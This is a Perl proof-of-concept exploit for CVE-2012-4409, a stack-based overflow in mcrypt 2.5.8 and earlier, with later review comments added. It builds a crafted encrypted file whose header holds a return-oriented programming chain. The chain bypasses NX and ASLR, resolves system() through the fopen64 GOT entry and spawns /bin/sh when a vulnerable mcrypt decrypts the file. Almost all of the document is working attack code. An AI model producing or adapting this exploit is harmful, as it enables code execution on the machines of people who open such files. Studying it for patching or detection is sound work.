#!/usr/bin/perl
# Title : mcrypt <= 2.5.8 STACK based overflow
# Date : 23/11/2012
# Exploit Author : Tosh
# CVE : CVE-2012-4409
# Patch : http://www.openwall.com/lists/oss-security/2012/09/06/8
# Tested on : Archlinux 3.6.6-1, without SSP
# This script exploits a stack-based overflow in mcrypt <= 2.5.8.
# It bypasses NX and ASLR protections, but not SSP.
# This exploit crafts an encrypted file; arbitrary code may be executed if the file is decrypted with a vulnerable version
# of mcrypt. The vulnerable function is check_file_head(), present in src/extra.c. See the CVE details or the patch for more
# information.
# The payload must be adjusted for other platforms; this is just a proof of concept :)
use strict;
use warnings;
# File-scoped lexicals shared with the subs below: write_file() reads
# $filename and $file, and build_file() appends to $file.  They are
# declared here, before the sub definitions, so the subs close over them.
my $filename = 'fake.nc';
my $file;
my $payload;
# Each progress line is printed before the step that can die() (payload()
# dies on an over-long payload, write_file() on an open failure), so a
# failure message appears under the step it belongs to.
print "[+] Build payload.\n";
$payload = payload();
print "[+] Build file.\n";
$file = build_file($payload);
print "[+] Writing $filename.\n";
write_file();
print "[+] DONE.\n";
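# Write the assembled file contents ($file, file-scoped) to $filename.
#
# Uses a lexical filehandle instead of the bareword F, and checks print()
# and close(): on a write handle, close() is where buffered write errors
# surface, and the original ignored its result, so a short or failed write
# would have been reported as "[+] DONE.".  All failures die with the
# script's "[-] ..." message style.  Returns nothing.
sub write_file {
    open my $fh, '>', $filename
        or die("[-] Can't open $filename : $!\n");
    print {$fh} $file
        or die("[-] Can't write $filename : $!\n");
    close $fh
        or die("[-] Can't close $filename : $!\n");
    return;
}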
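# Assemble the crafted container: the fixed header fields followed by the
# raw payload bytes passed as the only argument.  Returns the complete
# file contents as a string.
#
# The original appended to the file-scoped $file in place and read its
# argument as $_[0]; calling it twice would have doubled the header.  This
# version builds a local string and returns it -- the caller assigns the
# return value to $file, so the written output is unchanged.
sub build_file {
    my ($body) = @_;
    my $out = '';
    # magic
    $out .= "\x00m\x03";
    # flags
    $out .= pack('C', 1 << 6);
    # algorithm (looks like a placeholder rather than a real cipher name;
    # kept byte-for-byte from the original)
    $out .= "H\@Ck3d\x00";
    # keysize -- 'S' is native byte order; the rest of the script assumes a
    # little-endian x86 target (see the 'L' packs in payload()), so this is
    # only correct when run on a little-endian host
    $out .= pack('S', 0xdead);
    # mode
    $out .= "h\@cK3d\x00";
    # keymode
    $out .= "H\@CK3D\x00";
    # sflags
    $out .= "\xff";
    # payload -- a missing argument yields a bare header instead of an
    # "uninitialized value" warning
    $out .= $body // '';
    return $out;
}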
# Build the bytes that follow the fake header.  Every constant below is an
# address or offset taken from the author's test build (see the "Tested on"
# and "Payload must be adjusted" lines at the top of the file); they have
# no meaning for any other binary.  Dies if the result exceeds 0xfe bytes.
sub payload {
my $saved_eip_off = 0x71; # Buffer len for overwrite saved EIP
my $v_local_1 = 0x0805b000; # Local variable 1 overwriten
my $v_local_2 = 0x08048007; # Local variable 2 overwriten
my $ret_sled = 5; # Offset between saved EIP and local variables
my $strcpy_plt = 0x080499f0; # strcpy@plt address
my $fopen64_got = 0x0805b1c8; # fopen64 got entry
my $system_off = 0xfffd6b30; # fopen64 - system
my $w_mem = 0x0805b000; # writable memory, without ASLR
my $pop2_ret = 0x08055a63; # pop; pop; ret
my $ret = 0x0805a5ed; # ret
my $pop_ebx = 0x08056186; # pop ebx; ret
my $pop_edi = 0x08053460; # pop edi; ret
my $xchg_eax = 0x080517a4; # xchg eax, edi; ret
my $add_eax = 0x0804dabf; # add eax,[ebx-0x2776e73c]; pop ebx; ret
my $call_eax = 0x0804b357; # call eax; leave; ret
my $payload;
$payload .= "A"x$saved_eip_off;
$payload .= pack('L', $ret) x $ret_sled;
$payload .= pack('L', $pop2_ret);
$payload .= pack('L', $v_local_1);
$payload .= pack('L', $v_local_2);
# Copy "/bin/" in +W memory
$payload .= pack('L', $strcpy_plt);
$payload .= pack('L', $pop2_ret);
$payload .= pack('L', $w_mem + 0x00);
# NOTE(review): unnamed constant; presumably the address of a "/bin/"
# string in the test binary, going by the comment above -- not stated here
$payload .= pack('L', 0x08057fc2);
# Copy "sh" + "\x00" in +W memory
$payload .= pack('L', $strcpy_plt);
$payload .= pack('L', $pop2_ret);
$payload .= pack('L', $w_mem + 0x05);
# NOTE(review): unnamed constant; presumably the address of an "sh\0"
# string in the test binary, going by the comment above -- not stated here
$payload .= pack('L', 0x08048bab);
# Calc system() address with fopen64 GOT entry
$payload .= pack('L', $pop_ebx);
$payload .= pack('L', $fopen64_got + 0x2776e73c);
$payload .= pack('L', $pop_edi);
$payload .= pack('L', $system_off);
$payload .= pack('L', $xchg_eax);
$payload .= pack('L', $add_eax);
# Four filler bytes consumed by the "pop ebx" in the $add_eax gadget
$payload .= "HaCk";
# Call system("/bin/sh")
$payload .= pack('L', $call_eax);
$payload .= pack('L', $w_mem);
# 0xfe is the original's upper bound for this field; the reason for the
# limit is not stated in the file
die("[-] Payload too long !\n") if(length $payload > 0xfe);
return $payload;
}